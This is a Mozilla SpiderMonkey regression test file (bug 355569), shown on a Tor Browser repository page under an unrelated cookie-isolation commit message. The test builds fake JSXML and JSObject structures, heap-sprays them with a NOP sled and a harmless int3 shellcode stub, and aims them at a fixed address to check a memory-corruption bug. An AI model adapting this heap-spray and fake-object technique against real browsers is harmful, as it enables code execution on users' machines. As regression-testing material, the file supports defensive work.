The Tor Browser: js/src/tests/js1_8_5/regress/regress-355569.js@129ffea94266

Conditionally enable double key logic according to:
private browsing mode or privacy.thirdparty.isolate preference and
implement in GetCookieStringCommon and FindCookie where it counts...
With some reservations of how to convince FindCookie users to test
condition and pass a nullptr when disabling double key logic.

     1 /* -*- Mode: java; tab-width:8; indent-tabs-mode: nil; c-basic-offset: 4 -*- */

     3 /* This Source Code Form is subject to the terms of the Mozilla Public

     4  * License, v. 2.0. If a copy of the MPL was not distributed with this

     5  * file, You can obtain one at http://mozilla.org/MPL/2.0/. */

     7 var bug = 355569;

     8 var actual = '';

     9 var expect = '';

    11 printBugNumber (bug);

    12 printStatus (summary);

    14 var targetAddress = 0x12030010;

    15 var sprayParams = {

    16   chunkSize: 16 * 1024 * 1024,

    17   chunkCount: 16,

    18   chunkMarker: 0xdeadface,

    19   chunkAlign: 0x1000,

    20   reservedSize: 1024

    21 };

    23 function makeExploitCode() {

    24   /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */

    25   return "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2";

    26 }

    28 /*==========================================================================*/

    29 /*==========================================================================*/

    31 function packData(template, A) {

    32   var n = 0, result = "", vl;

    33   for(var i = 0; i < template.length; i++) {

    34     var ch = template.charAt(i);

    35     if(ch == "s" || ch == "S") {

    36       vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff);

    37     } else if(ch == "l" || ch == "L") { // XXX endian

    38       vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff, vl >> 16);

    39     } else if(ch == "=") {

    40       result += String(A[n++]);

    41     }

    42   }

    43   return result;

    44 }

    45 function buildStructure(worker, address) {

    46   var offs = {}, result = "", context = {

    47     append: function(k, v) { offs[k] = result.length * 2; result += v; },

    48     address: function(k) { return address + ((k && offs[k]) || 0); }

    49   }; worker(context); result = ""; worker(context); return result;

    50 }

    51 function repeatToLength(s, L) {

    52   if(L <= s.length) { return s.substring(0, L); }

    53   while(s.length <= L/2) { s += s; }

    54   return s + s.substring(0, L - s.length);

    55 }

    56 function sprayData(data, params, rooter) {

    57   var marker = packData("L", [ params.chunkMarker ]);

    58   data += repeatToLength("\u9090", params.chunkAlign / 2 - data.length);

    59   data = repeatToLength(data, (params.chunkSize - params.reservedSize) / 2);

    60   for(var i = 0; i < params.chunkCount; i++) {

    61     rooter[i] = marker + data + i;

    62   }

    63 }

    65 function T_JSObject(map, slots)

    66 { return packData("LL", arguments); }

    67 function T_JSObjectMap(nrefs, ops, nslots, freeslot)

    68 { return packData("LLLL", arguments); }

    69 function T_JSObjectOps(

    70   newObjectMap, destroyObjectMap, lookupProperty, defineProperty,

    71   getProperty, setProperty, getAttributes, setAttributes,

    72   deleteProperty, defaultValue, enumerate, checkAccess,

    73   thisObject, dropProperty, call, construct,

    74   xdrObject, hasInstance, setProto, setParent,

    75   mark, clear, getRequiredSlot, setRequiredSlot

    76 ) { return packData("LLLLLLLL LLLLLLLL LLLLLLLL", arguments); }

    78 function T_JSXML_LIST(

    79   object, domnode, parent, name, xml_class, xml_flags,

    80   kids_length, kids_capacity, kids_vector, kids_cursors,

    81   xml_target, xml_targetprop

    82 ) { return packData("LLLLSS LLLL LL", arguments); }

    83 function T_JSXML_ELEMENT(

    84   object, domnode, parent, name, xml_class, xml_flags,

    85   kids_length, kids_capacity, kids_vector, kids_cursors,

    86   nses_length, nses_capacity, nses_vector, nses_cursors,

    87   atrs_length, atrs_capacity, atrs_vector, atrs_cursors

    88 ) { return packData("LLLLSS LLLL LLLL LLLL", arguments); }

    90 /*==========================================================================*/

    91 /*==========================================================================*/

    93 function makeExploitData(address) {

    94   return buildStructure(function(ctx) {

    95     ctx.append("xml-list",

    96       T_JSXML_LIST(0, 0, 0, 0, 0, 0, 1, 0, ctx.address("xml-kids-vector"), 0, 0, 0));

    97     ctx.append("xml-kids-vector",

    98       packData("L", [ ctx.address("xml-element") ]));

    99     ctx.append("xml-element",

   100       T_JSXML_ELEMENT(ctx.address("object"), 0, 0, 0, 1, 0, 0, 0, 0, 0, /*c*/ 0, 0, 0, 0, /*d*/ 0, 0, 0, 0));

   101     ctx.append("object",

   102       T_JSObject(ctx.address("object-map"), 0));

   103     ctx.append("object-map",

   104       T_JSObjectMap(0, ctx.address("object-ops"), 0, 0));

   105     ctx.append("object-ops",

   106       T_JSObjectOps(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ctx.address("exploit-code"), 0));

   107     ctx.append("exploit-code",

   108       makeExploitCode(ctx));

   109   }, address);

   110 }

   112 function exploit() {

   113   sprayData(makeExploitData(targetAddress), sprayParams, this.rooter = {});

   114   var numobj = new Number(targetAddress >> 1);

   115   printStatus("probably not exploitable");

   116 }

   118 try

   119 {

   120     exploit();

   121 }

   122 catch(ex)

   123 {

   124 }

   126 reportCompare(expect, actual);

The Tor Browser / file revision

js/src/tests/js1_8_5/regress/regress-355569.js@129ffea94266

js/src/tests/js1_8_5/regress/regress-355569.js